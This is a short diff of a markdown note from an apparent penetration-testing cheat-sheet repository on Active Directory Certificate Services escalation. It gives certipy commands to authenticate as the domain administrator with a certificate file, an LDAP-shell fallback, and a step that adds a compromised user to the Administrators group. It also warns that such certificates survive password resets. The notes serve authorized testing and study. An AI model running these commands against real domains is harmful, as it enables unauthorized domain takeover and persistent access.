H3llKa1ser/B00t2R00t/Active Directory Penetration Testing/Active Directory Certificate Services (ADCS)/Domain Escalation (ESC).md

     certipy auth -pfx 'administrator.pfx' -username 'administrator' -domain 'corp.local' -dc-ip 172.16.19.100

+#### If you get a PKINIT error, authenticate via LDAP

+    certipy auth -pfx 'administrator.pfx' -username 'administrator' -domain 'corp.local' -dc-ip 172.16.19.100 -ldap-shell

+#### 5) Upon authenticating via LDAP, add one of your compromised users to the administrators group

+    # add_user_to_group user Administrators

 ## WARNING!
 These certificates will still be usable even if the user or computer resets their password!